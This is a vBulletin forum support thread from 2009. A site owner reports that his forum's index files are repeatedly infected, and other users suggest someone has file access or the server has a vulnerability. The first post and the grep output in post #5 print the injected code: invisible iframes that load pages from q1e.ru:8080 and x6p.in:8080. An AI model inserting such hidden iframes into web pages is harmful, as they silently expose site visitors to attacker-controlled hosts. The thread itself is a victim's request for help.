Go Back   vb.org Archive > vBulletin 3 Discussion > vB3 General Discussions
  #1  
Old 07-26-2009, 01:57 PM
ezak ezak is offline
 
Join Date: Nov 2004
Posts: 121
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default my forum is inficted with unknow virus

from month I face problem
that all my index* contan this code

PHP Code:
<iframe src="http://q1e.ru:8080/index.php" width=143 height=132 style="visibility: hidden"></iframe
its infect ./forum/index.php, /index.html (redirect to forum/index.php), /admincp/index.php. modcp/index.php ... and anyfile with index name will be infected


and its stop my forum
I removed alt of other scripts on that site, and scan for virus, and installed modsecuirty with most rules

and its happened again , and don't know why this problem, dose anyone know anything about this virus ?
Reply With Quote
  #2  
Old 07-27-2009, 08:55 AM
Marco van Herwaarden Marco van Herwaarden is offline
 
Join Date: Jul 2004
Posts: 25,415
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

What kind of server are you on? A shared server?

Most likely someone has access to your files and is editing them.
Reply With Quote
  #3  
Old 07-27-2009, 09:26 AM
ezak ezak is offline
 
Join Date: Nov 2004
Posts: 121
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

I'm on VPS and all my site is mine
and the other site is not have this problem
only this one
, and that happened suddenly, change all index file with that code
its have some sites like
Code:
http://q1e.ru:8080
and other similar to, don't know what is it

its happened weekly or all 5 days
Reply With Quote
  #4  
Old 07-27-2009, 09:45 AM
Marco van Herwaarden Marco van Herwaarden is offline
 
Join Date: Jul 2004
Posts: 25,415
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

Contact your host, most likely someone has access to your files.
Reply With Quote
  #5  
Old 07-28-2009, 07:30 AM
ezak ezak is offline
 
Join Date: Nov 2004
Posts: 121
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

its give me crazy
some info form
grep -R iframe *
all my styles , and the forum index

PHP Code:
vb/ubetube/misc/index.html:<iframe src="http://x6p.in:8080/index.php" width=188 height=195 style="visibility: hidden"></ifram
vb
/ubetube/misc/index.html:<iframe src="http://q1e.ru:8080/index.php" width=143 height=132 style="visibility: hidden"></iframe>
vb/ubetube/ranks/index.html:<iframe src="http://x6p.in:8080/index.php" width=188 height=195 style="visibility: hidden"></ifram
vb
/ubetube/ranks/index.html:<iframe src="http://q1e.ru:8080/index.php" width=143 height=132 style="visibility: hidden"></iframe>
vb/ubetube/avatars/thumbs/index.html:<iframe src="http://x6p.in:8080/index.php" width=188 height=195 style="visibility: hidden"></ifram
vb
/ubetube/avatars/thumbs/index.html:<iframe src="http://q1e.ru:8080/index.php" width=143 height=132 style="visibility: hidden"></iframe>
vb/ubetube/avatars/index.html:<iframe src="http://x6p.in:8080/index.php" width=188 height=195 style="visibility: hidden"></ifram
vb
/ubetube/avatars/index.html:<iframe src="http://q1e.ru:8080/index.php" width=143 height=132 style="visibility: hidden"></iframe>
vb/ubetube/attach/index.html:<iframe src="http://x6p.in:8080/index.php" width=188 height=195 style="visibility: hidden"></ifram
vb
/ubetube/attach/index.html:<iframe src="http://q1e.ru:8080/index.php" width=143 height=132 style="visibility: hidden"></iframe>
vb/ubetube/index.html:<iframe src="http://x6p.in:8080/index.php" width=188 height=195 style="visibility: hidden"></ifram
vb
/ubetube/index.html:<iframe src="http://q1e.ru:8080/index.php" width=143 height=132 style="visibility: hidden"></iframe>
vb/ubetube/gradients/index.html:<iframe src="http://x6p.in:8080/index.php" width=188 height=195 style="visibility: hidden"></ifram
vb
/ubetube/gradients/index.html:<iframe src="http://q1e.ru:8080/index.php" width=143 height=132 style="visibility: hidden"></iframe>
vb/ubetube/smilies/index.html:<iframe src="http://x6p.in:8080/index.php" width=188 height=195 style="visibility: hidden"></ifram
vb
/ubetube/smilies/index.html:<iframe src="http://q1e.ru:8080/index.php" width=143 height=132 style="visibility: hidden"></iframe>
vb/ubetube/buttons/index.html:<iframe src="http://x6p.in:8080/index.php" width=188 height=195 style="visibility: hidden"></ifram
vb
/ubetube/buttons/index.html:<iframe src="http://q1e.ru:8080/index.php" width=143 height=132 style="visibility: hidden"></iframe>
vb/ubetube/icons/index.html:<iframe src="http://x6p.in:8080/index.php" width=188 height=195 style="visibility: hidden"></ifram
vb
/ubetube/icons/index.html:<iframe src="http://q1e.ru:8080/index.php" width=143 height=132 style="visibility: hidden"></iframe>
vb/ubetube/polls/index.html:<iframe src="http://x6p.in:8080/index.php" width=188 height=195 style="visibility: hidden"></ifram
vb
/ubetube/polls/index.html:<iframe src="http://q1e.ru:8080/index.php" width=143 height=132 style="visibility: hidden"></iframe>
vb/ubetube/statusicon/index.html:<iframe src="http://x6p.in:8080/index.php" width=188 height=195 style="visibility: hidden"></ifram
vb
/ubetube/statusicon/index.html:<iframe src="http://q1e.ru:8080/index.php" width=143 height=132 style="visibility: hidden"></iframe>
vb/ubetube/regimage/index.html:<iframe src="http://x6p.in:8080/index.php" width=188 height=195 style="visibility: hidden"></ifram
vb
/ubetube/regimage/index.html:<iframe src="http://q1e.ru:8080/index.php" width=143 height=132 style="visibility: hidden"></iframe>
vb/ubetube/regimage/backgrounds/index.html:<iframe src="http://x6p.in:8080/index.php" width=188 height=195 style="visibility: hidden"></ifram
vb
/ubetube/regimage/backgrounds/index.html:<iframe src="http://q1e.ru:8080/index.php" width=143 height=132 style="visibility: hidden"></iframe>
vb/ubetube/regimage/fonts/index.html:<iframe src="http://x6p.in:8080/index.php" width=188 height=195 style="visibility: hidden"></ifram
vb
/ubetube/regimage/fonts/index.html:<iframe src="http://q1e.ru:8080/index.php" width=143 height=132 style="visibility: hidden"></iframe>
vb/ubetube/editor/index.html:<iframe src="http://x6p.in:8080/index.php" width=188 height=195 style="visibility: hidden"></ifram
vb
/ubetube/editor/index.html:<iframe src="http://q1e.ru:8080/index.php" width=143 height=132 style="visibility: hidden"></iframe>
vb/ubetube/reputation/index.html:<iframe src="http://x6p.in:8080/index.php" width=188 height=195 style="visibility: hidden"></ifram
vb
/ubetube/reputation/index.html:<iframe src="http://q1e.ru:8080/index.php" width=143 height=132 style="visibility: hidden"></iframe>
vb/ubetube/rating/index.html:<iframe src="http://x6p.in:8080/index.php" width=188 height=195 style="visibility: hidden"></ifram
vb
/ubetube/rating/index.html:<iframe src="http://q1e.ru:8080/index.php" width=143 height=132 style="visibility: hidden"></iframe
every day now , all index is contain this code
Reply With Quote
  #6  
Old 07-28-2009, 08:38 AM
flapjack flapjack is offline
 
Join Date: Jan 2006
Location: Tampa Bay, Florida
Posts: 38
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

Your webserver has a vulnerability of some sort.

Probably to do with an old version of cPanel or something like that.
Reply With Quote
  #7  
Old 07-30-2009, 10:44 AM
Marco van Herwaarden Marco van Herwaarden is offline
 
Join Date: Jul 2004
Posts: 25,415
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

See post #4.
Reply With Quote
  #8  
Old 07-30-2009, 11:35 AM
ezak ezak is offline
 
Join Date: Nov 2004
Posts: 121
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

I'm already manage this host
that is my own VPS, and I already have control to the Node server
and I don't know what to do
I have already secure my server
with CSF hard config, and install Mod_Security with most common rules

--------------- Added [DATE]1248957645[/DATE] at [TIME]1248957645[/TIME] ---------------

I found this maybe related with my isuss

http://blog.unmaskparasites.com/2009...k-php-exploit/
Reply With Quote
Reply

Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off

Forum Jump


All times are GMT. The time now is 08:47 AM.


Powered by vBulletin® Version 3.8.12 by vBS
Copyright ©2000 - 2024, vBulletin Solutions Inc.
X vBulletin 3.8.12 by vBS Debug Information
  • Page Generation 0.04377 seconds
  • Memory Usage 2,288KB
  • Queries Executed 11 (?)
More Information
Template Usage:
  • (1)SHOWTHREAD
  • (1)ad_footer_end
  • (1)ad_footer_start
  • (1)ad_header_end
  • (1)ad_header_logo
  • (1)ad_navbar_below
  • (1)ad_showthread_beforeqr
  • (1)ad_showthread_firstpost
  • (1)ad_showthread_firstpost_sig
  • (1)ad_showthread_firstpost_start
  • (1)bbcode_code
  • (2)bbcode_php
  • (1)footer
  • (1)forumjump
  • (1)forumrules
  • (1)gobutton
  • (1)header
  • (1)headinclude
  • (1)navbar
  • (3)navbar_link
  • (120)option
  • (8)post_thanks_box
  • (8)post_thanks_button
  • (1)post_thanks_javascript
  • (1)post_thanks_navbar_search
  • (8)post_thanks_postbit_info
  • (8)postbit
  • (8)postbit_onlinestatus
  • (8)postbit_wrapper
  • (1)spacer_close
  • (1)spacer_open
  • (1)tagbit_wrapper 

Phrase Groups Available:
  • global
  • inlinemod
  • postbit
  • posting
  • reputationlevel
  • showthread
Included Files:
  • ./showthread.php
  • ./global.php
  • ./includes/init.php
  • ./includes/class_core.php
  • ./includes/config.php
  • ./includes/functions.php
  • ./includes/class_hook.php
  • ./includes/modsystem_functions.php
  • ./includes/functions_bigthree.php
  • ./includes/class_postbit.php
  • ./includes/class_bbcode.php
  • ./includes/functions_reputation.php
  • ./includes/functions_post_thanks.php 

Hooks Called:
  • init_startup
  • init_startup_session_setup_start
  • init_startup_session_setup_complete
  • cache_permissions
  • fetch_threadinfo_query
  • fetch_threadinfo
  • fetch_foruminfo
  • style_fetch
  • cache_templates
  • global_start
  • parse_templates
  • global_setup_complete
  • showthread_start
  • showthread_getinfo
  • forumjump
  • showthread_post_start
  • showthread_query_postids
  • showthread_query
  • bbcode_fetch_tags
  • bbcode_create
  • showthread_postbit_create
  • postbit_factory
  • postbit_display_start
  • post_thanks_function_post_thanks_off_start
  • post_thanks_function_post_thanks_off_end
  • post_thanks_function_fetch_thanks_start
  • post_thanks_function_fetch_thanks_end
  • post_thanks_function_thanked_already_start
  • post_thanks_function_thanked_already_end
  • fetch_musername
  • postbit_imicons
  • bbcode_parse_start
  • bbcode_parse_complete_precache
  • bbcode_parse_complete
  • postbit_display_complete
  • post_thanks_function_can_thank_this_post_start
  • tag_fetchbit_complete
  • forumrules
  • navbits
  • navbits_complete
  • showthread_complete